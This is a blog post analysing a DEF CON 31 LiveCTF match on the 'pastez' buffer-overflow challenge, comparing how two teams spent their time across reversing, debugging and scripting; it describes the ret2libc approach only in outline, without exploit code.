Skip to main content
Secrets of Speed: A LiveCTF Match Under the Microscope
  1. Posts/

Secrets of Speed: A LiveCTF Match Under the Microscope

·

As the CTF community has grown and the game has matured, we’ve seen an upward trend in both speed and sophistication of competitors and challenges, but one of the most interesting and pervasive questions remains: what do CTF champions do that sets them apart?

There’s not much data available on the actual performance of top CTF players, but today we’re going to dig into the recordings of a high-profile event: LiveCTF at DEF CON 31.

We’ll look at the tools and tactics of two world-class competitors, compare their performances, identify the turning point in the match, and talk about what we can learn from both of them.

If you want to play the challenge yourself (before any spoilers), check out this repo. The time to beat is 15:33… good luck!

What is LiveCTF? #

LiveCTF is an event currently held in conjunction with the DEF CON CTF, consisting of a series of CTF challenges built to be solved quickly with sportscast-style commentary streamed in order to share a breakdown of the action with viewers.

LiveCTF Website showing links to streams

At the DEF CON 31 CTF finals, LiveCTF was played as a double-elimination tournament where each team from the finals competed in first-to-solve matches, with the winning teams earning points for their team’s overall score in the DEF CON CTF.

Each match was capped at 50 minutes with hints dropped at 20 and 35 minutes, and if neither player solves within the time limit, a “sudden death” challenge designed to be solved quickly was used to decide the winner.

Screenshot of competitor’s instructions for LiveCTF at DEF CON 31 CTF Finals

While the category of challenges varied, the most common was Linux x86 binary exploitation “pwnable”, though each challenge’s category was given ahead of time to help teams pick their representative.

Early in the tournament, two head-to-head matches were played concurrently for each challenge, with one match being commentated live and the other match being shown via dual livestream of each players’ screen. These full-screen streams give an HD view into the techniques some of the top CTF competitors in the world used, and they’re the source for our detailed breakdown today.

Framework for solving CTF challenges #

In order to communicate about how players solve these kinds of challenges, it helps to have a framework that breaks down the process into different steps that we can watch the players go through.

While there’s no accepted framework for how to think about CTF challenges, most of the people I have spoken to tend to have the same general understanding of steps required, which I describe as:

  1. Determine the objective, or what we’re supposed to do
  2. Figure out what building blocks we have to work with
  3. Determine how we can use those building blocks to try to achieve the objective
  4. Successfully put together the building blocks and solve the problem

These are very generic because part of the fun of CTF is that you never know what weird stuff you’ll need to do for a challenge, and different people come up with different strategies and solutions.

This way of thinking about challenges also lets us talk about why a challenge is hard: in some cases what you can do is obvious, but figuring out how to do it is the hard part (and other challenges are the reverse).

Such a generic approach can also address larger or multi-layered challenges, where we go through this cycle several times, expanding what we can do until we can achieve the overall objective.

For a standard binary exploitation challenge like many of the LiveCTF challenges, those steps typically look something like:

  1. Objective: Achieve remote code execution (either by submitting a flag planted on a remote machine, or in the case of LiveCTF, running a binary to show you won)
  2. Building blocks: Reverse-engineer the target and find bug(s) to leverage
  3. Determine how to use the bugs to exploit the binary on the remote box
  4. Successfully exploit the binary on the remote machine and capture the flag!

Screenshot from the commentated steam of Shellphish winning the pastez challenge
An example of what winning a LiveCTF challenge at DEF CON 31 looked like for a competitor.

Different players tend to use a mix of strategies to solve such challenges, mostly depending on their own personal preferences. One of the big questions going into this year’s LiveCTF was how different the players’ strategies would be and whether certain strategies would dominate.

LiveCTF match under the microscope #

This analysis will cover a single challenge from the second day of LiveCTF: pastez, where the two head-to-head matches: #13: Norsecode vs Blue Waterand #14: Shellphish vs P1G But S4D

LiveCTF Bracket for DEF CON 31 highlighting pastez

Since match #14 got a live commentary, we focused on analyzing the dual livestreams of match #13 to get the juicy ground truth data.

One of the awesome parts about LiveCTF is that all the data is open, so you can check out the GitHub repo to see this problem and its reference solution, as well as see the problem & solution info for all of the other problems from LiveCTF.

The challenge pastez is a standard stack buffer overflow problem, where there aren’t a ton of reversing obstacles or exploit mitigations in play because it is supposed to be solvable in under 50 minutes.

While there were some simpler problems, pastez gave a good example of what a typical LiveCTF challenge looks like:

  • Limited number of functions to reverse-engineer
  • Easy-to-parse input menu
  • Limited mitigations: NX is on, but no stack canaries and no PIE (main binary not ASLR’d)
  • Expected solution is to leak a pointer and get a shell via ROP (ret2libc)

So let’s see how the competitors did!

Speed solving breakdown #

Since we have uninterrupted feeds for Norsecode and Blue Water, we can observe everything they did over the course of the match, but looking at data spanning the entire 15 minutes and 33 seconds of the match doesn’t capture the detail of what happened.

So instead we’ll break it down into three phases following the general framework from the previous section and set checkpoints to get a sense of when they transition from one phase into the next.

Breaking down the problem this way allows us to see how fast Blue Water and Norsecode moved through the phases and also dig deeper on what they did in specific to each phase. The three checkpoints I picked for pastez to mark the end of each phase are:

  1. Phase 1: Figure out the bug
    • Checkpoint 1: time of first segfault showing the competitor had figured out the buffer overflow
  2. Phase 2: Determine exploitation strategy
    • Checkpoint 2: time of libc leak, since ret2libc required such an infoleak
  3. Phase 3: Exploit remote server and run the submission binary to win
    • Checkpoint 3: time when submission binary is run

Screenshot of Norsecode printing out the infoleak in garbled unicode form
Screenshot of Norsecode hitting Checkpoint 2: leaking a libc pointer (as binary data).

If we look at the time breakdown for each of these checkpoints, we can see that while Blue Water hits Checkpoint 1 first, Norsecode isn’t far behind… and then Norsecode storms through the remaining steps with impressive speed:

CheckpointBlue WaterNorsecode
Checkpoint 18:36: segfault observed9:31: segfault observed
Checkpoint 215:33: Match ends13:02, +3:31: libc leak printed to terminal
Checkpoint 3-15:33, +2:31: Win submitted

Bar graph of each competitors’ time to each checkpoint

One of the interesting things about LiveCTF is that we observed almost exactly the same general toolkit used across all the competitors:

  • Reverse Engineering: IDA or Ghidra
  • Debugging: gdb with a CTF gdbinit (pwndbg, GEF, or PEDA)
  • Script writing: VSCode or vim, usually using Python and pwntools

If we look at how much time each competitor spends using each of these tools in the different phases, we can see a clear difference:

ToolsBlue Water Phase 1Norsecode Phase 1Blue Water Phase 2Norsecode Phase 2Norsecode Phase 3
IDA6:415:263:460:000:00
Terminal1:301:442:241:190:46
VSCode0:001:460:472:121:45
Startup0:250:35---
Total8:36 (0:00-8:36)9:31 (0:00-9:31)6:57 (8:36-15:33)3:31 (9:31-13:02)2:31 (13:02-15:33)

Bar graph of tool usage time for each player and phase

After Norsecode gets the first checkpoint (the initial crash), they never return to reversing and proceed strictly with debugging the target and iterating on their solution script. This is in contrast to their competitor, who went back to RE and spent less time scripting and debugging.

My first question was “what did each competitor look at in IDA and was there a difference that led one competitor to figure out the bug and the exploitation strategy faster”? We can examine how much time each competitor spent on each function or component during phase 1, which is when they initially find and understand the bug:

Function/ComponentBlue WaterNorsecode
Total phase 1 RE6:415:26
sanitize2:401:45
insert_message1:090:42
main0:521:38
rud_messages0:490:30
edit_message0:340:15
bad_words (.data)0:160:07
print_messages0:090:06
Structures Tab0:080:18
Strings Tab0:03-
delete_message0:010:05

Relevant call graph for pastez
The call graph for pastez gives a sense of size; the binary is small but not trivial.

The first impression from watching these competitors perform RE is that they are both very fast, reversing and triaging functions in a matter of seconds, moving extremely quickly between functions, and needing only a few minutes to find the bug.

The second thing we notice is that their analysis durations are also very similar, both having the same top 4 functions in terms of duration. Both players spent the most time looking at the sanitize function, which is both where the stack buffer is allocated and the overflow occurs.

Blue Water spent more time in IDA, but they also got a crash faster, so I’d argue these performances are evenly matched with Blue Water having a slight edge. Nothing else particularly stands out for phase 1 reversing.

Since there wasn’t a major difference on the static analysis side, let’s look at the dynamic analysis: how many times did each player run the target and how did they run it?

Blue WaterNorsecode
Without debugger71
With gdb (command-line)30
Under solve script422*
Total runs1423
Runs before first crash711

*Norsecode’s solve script ran the target under gdb automatically

This matches up with the data we’ve seen so far, where Blue Water spent more time doing static analysis overall. There’s no right answer for how to balance static and dynamic analysis; it varies depending on the player and the problem, but we can also see that Blue Water ran the target manually 50% of the time.

While this data may suggest certain conclusions, we have to look at it in context to see what really made the difference in this match.

Deciding factors in a speed challenge #

Since Norsecode ended up winning after 15 minutes and 33 seconds, we don’t get to see how fast Blue Water would have been able to solve… but the winner of the other match (Shellphish) took almost 22 minutes longer to solve, so we can tell that Norsecode was doing something right!

This time variance is what we saw a lot in LiveCTF: many parts of the match were neck-and-neck, and the difference usually came down to who was “stuck” for less time.

A player taking a note indicating their momentary confusion
Getting stuck is an integral part of CTF. Getting un-stuck fast is the key.

Capitalizing on the overwrite #

Since Norsecode cleared checkpoints 2 and 3 before Blue Water finished checkpoint 2, the big question is “what was the difference in the player’s actions after the first checkpoint (getting the initial crash)?”

Right after seeing the segfault, Norsecode went directly to getting precise control of the return address overwrite.

Norsecode’s overflow as shown in gdb
Norsecode’s overflow as shown in gdb.

This is in contrast to Blue Water’s actions after seeing the crash, which was to split time between the debugger and IDA. My theory is that they weren’t as efficient because their initial crash was from a longer overwrite that crashed in strchr in the middle of sanitize, instead of showing that the return address was overwritten at the end of sanitize like Norsecode saw.

Blue Water’s overflow as shown in gdb
Blue Water’s overflow as shown in gdb.

Part of this is luck, but I think the other part is that Norsecode had more precise control of their overflow because they were primarily using their script to exercise the target. They also see the same crash in strchr right after their initial segfault, but they then dial in their overflow and isolate the return address using a cyclic pattern.

After Blue Water gets their initial crash, they look at the strchr call and try to isolate the buffer and where it is written. They take good steps to go between IDA and gdb to follow the overwrite, and then build out their script to get better control, but this is where they really lose momentum.

And so this ends up being the turning point in the match: how each competitor debugged the crash and transitioned to a useful overwrite.

At this point I have to point out that it’s easy to play back the performance and comment, but we can’t judge these competitors.

They were under a ton of stress playing in the DEF CON CTF finals, and it’s easy to sit on the sidelines and second-guess them. The LiveCTF event was essentially a full-on sprint in the middle of an ultramarathon, so any mistakes that players make are not a reflection on their skill; all the competitors were truly top-tier.

Secrets of speed #

In general though, Norsecode’s performance is a good one to learn from because they do a good job of executing cleanly, and they also recover quickly when they don’t get something right on the first try, for example:

  • They figured out pretty quickly that spaces are needed between instances of the word “hack” to get the overwrite (which is actually a really nice touch by the challenge author because it tripped up both competitors, though not for too long)
  • Later their libc leak is misaligned by one byte, but they saw and corrected it very quickly
  • At the very end they had to add an extra RET gadget to get the stack properly aligned for when they ROP to system

The ability to do this at high speed shows how practiced they are; this is what helps them keep a clear understanding of what they’re looking at and anticipate what problems might arise. They do it so quickly that it’s easy to miss unless you’re really watching closely and following along (which is also an excellent way to learn).

As for general strategies for success, I think there were two that were shown this match:

  1. It helps to work step-by-step, focusing on what’s next: always moving directly towards answering your next question (e.g. “I have a stack buffer overflow, what can I do with it?”), revisiting/consolidating what you know when needed, and using the best tool for answering the current question (exploring an overwrite: focus on the debugger).
  2. Script to win: focusing on using your solve script to actuate the target seems to be a dominant strategy, because it can also run the target in a debugger if you set it up right. Plus, it saves you keystrokes because you don’t need to type things in two places.

If there was one tool that I’d be interested to see competitors try out in the future, it would be reversible debugging. Getting gdb configured for this isn’t always easy depending on the environment, but being able to rewind and see exactly where a buffer overflow happened can be a lot easier than re-running the target a bunch of times.

Other than that, it seems to help if you’re super familiar with your tools, experienced with challenge patterns and solving strategies, and being really fast at reading and writing code… but that really just comes down to a lot of practice and getting reps in.

Lessons learned from LiveCTF #

So after diving that deep into the nitty gritty of hacking under pressure, it’s pretty obvious that these players are really good at what they’re doing… and that LiveCTF is a great resource for picking up tips, techniques, and strategies from top CTF players.

To keep up with future events, follow LiveCTF on Twitter.

Personally I think these kinds of events are a fantastic way to get good at software security because they push us to be flexible and go outside our comfort zone, and there are a huge amount of transferable skills to real-world applications.

If you liked this breakdown of intense CTF action please follow or let me know what you thought on Twitter or Mastodon. It takes a lot of work to put something like this together, but I hope you enjoyed it!

Til next time, CTF fans!